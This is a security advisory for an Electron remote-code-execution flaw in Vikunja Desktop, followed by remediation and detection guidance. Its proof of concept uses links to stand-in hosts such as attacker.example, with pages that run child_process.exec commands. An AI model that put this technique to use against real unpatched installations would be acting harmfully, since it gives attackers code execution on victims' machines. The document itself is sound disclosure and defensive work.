Vikunja is an open-source self-hosted task management platform. Starting in version 0.21.0 and prior to version 2.2.0, the Vikunja Desktop Electron wrapper enables `nodeIntegration` in the main BrowserWindow and does not restrict same-window navigations. An attacker who can place a link in user-generated content (task descriptions, comments, project descriptions) can cause the BrowserWindow to navigate to an attacker-controlled origin, where JavaScript executes with full Node.js access, resulting in arbitrary code execution on the victim's machine. Version 2.2.0 patches the issue.
## Root cause
Two misconfigurations combine to create this vulnerability:
1. **`nodeIntegration: true`** is set in `BrowserWindow` web preferences (`desktop/main.js:14-16`), giving any page loaded in the renderer full access to Node.js APIs (`require`, `child_process`, `fs`, etc.).
2. **No `will-navigate` or `will-redirect` handler** is registered on the `webContents`. The existing `setWindowOpenHandler` (`desktop/main.js:19-23`) only intercepts `window.open()` calls (new-window requests). It does **not** intercept same-window navigations triggered by:
- `<a href="https://...">` links (without `target="_blank"`)
- `window.location` assignments
- HTTP redirects
- `<meta http-equiv="refresh">` tags
## Attack scenario
1. The attacker is a normal user on the same Vikunja instance (e.g., a member of a shared project).
2. The attacker creates or edits a project description or task description containing a standard HTML link, e.g.: `<a href="https://evil.example/exploit">Click here for the updated design spec</a>`
3. The Vikunja frontend renders this link. DOMPurify sanitization correctly allows it -- it is a legitimate anchor tag, not a script injection. Render path example: `frontend/src/views/project/ProjectInfo.vue` uses `v-html` with DOMPurify-sanitized output.
4. The victim uses Vikunja Desktop and clicks the link.
5. Because no `will-navigate` handler exists, the BrowserWindow navigates to `https://evil.example/exploit` in the same renderer process.
6. The attacker's page now executes in a context with `nodeIntegration: true` and runs: `require('child_process').exec('id > /tmp/pwned');`
7. Arbitrary commands execute as the victim's OS user.
## Impact
Full remote code execution on the victim's desktop. The attacker can read/write arbitrary files, execute arbitrary commands, install malware or backdoors, and exfiltrate credentials and sensitive data. No XSS vulnerability is required -- a normal, sanitizer-approved hyperlink is sufficient.
## Proof of concept
1. Set up a Vikunja instance with two users sharing a project.
2. As the attacker user, edit a project description to include: `<a href="https://attacker.example/poc.html">Meeting notes</a>`
3. Host poc.html with: `<script>require('child_process').exec('calc.exe')</script>`
4. As the victim, open the project in Vikunja Desktop and click the link.
5. calc.exe (or any other command) executes on the victim's machine.
## Credits
This vulnerability was found using [GitHub Security Lab Taskflows](https://github.com/GitHubSecurityLab/seclab-taskflows).
Vikunja Desktop (versions 0.21.0 through 2.1.x) contains a critical remote code execution vulnerability: Node.js integration is enabled in the renderer and same-window navigation is not restricted. An attacker who can embed a link in a shared task or project description gets arbitrary code execution, with the privileges of the victim's OS user, as soon as the victim clicks the link in Vikunja Desktop. Every organization using Vikunja Desktop for collaborative task management is affected, and especially those whose shared projects include untrusted or semi-trusted users.
Immediate Actions:
1. Disable or uninstall Vikunja Desktop on all endpoints until patching is complete. Use web-based Vikunja access only (web version is not affected).
2. Audit Vikunja project descriptions, task descriptions, and comments for suspicious links (especially those pointing to external domains or IP addresses).
3. Review process-creation telemetry (Windows Security event 4688 or Sysmon event 1, macOS unified log or EDR process events, Linux auditd `execve` records) for shells or other unexpected child processes of Vikunja Desktop on machines where it was used.
4. Scan endpoints with EDR/antivirus for malware indicators and lateral movement artifacts.
Patching Guidance:
5. Upgrade Vikunja Desktop to version 2.2.0 or later, which contains the fix.
6. Keep the Vikunja server current as general hygiene, but do not treat a server update as a mitigation for this issue: the attack needs only a sanitizer-approved hyperlink, so server-side sanitization does not block it. The fix is in the desktop wrapper.
Compensating Controls (if patching is delayed):
7. Block outbound connections from the Vikunja Desktop process to anything other than the Vikunja API host (per-program host firewall rules on Windows, an application firewall or EDR network control elsewhere). This does not stop the navigation itself, but it prevents the attacker's page from loading.
8. Apply application allowlisting (AppLocker/WDAC or the platform equivalent). Note that `child_process.exec` runs through `cmd.exe` or `/bin/sh`, which allowlists usually permit, and that Node.js file and network access inside the renderer is not a separate process at all, so allowlisting limits follow-on payloads rather than the initial execution.
9. Use endpoint detection and response (EDR) with behavioral monitoring tuned for shells and interpreters spawned by Electron applications.
10. If your deployment can render descriptions and comments as plain text instead of HTML, do so until patched; this removes clickable links at the cost of the editor's formatting.
Detection Rules:
- Alert when a Vikunja Desktop (Electron) process is the parent of a shell or interpreter (cmd.exe, powershell.exe, pwsh.exe, bash, sh, zsh). Electron's own renderer, GPU and utility helpers are expected children: they run the same binary (or a "Helper" binary on macOS) and should be excluded, while `/bin/sh` running `xdg-open` on Linux is the normal path for `shell.openExternal` and is better logged at low severity than alerted on.
- Alert on network connections from Vikunja Desktop to any host other than the configured Vikunja API host (and, for an http(s)-served frontend, its origin).
- Flag file system writes by Vikunja Desktop outside its own user-data directory, in particular to startup locations, shell profiles and other user home directory paths.
- Calls such as `require('child_process')` inside the renderer are not visible to OS-level telemetry; they can only be caught inside the application itself or by their side effects, which the rules above cover.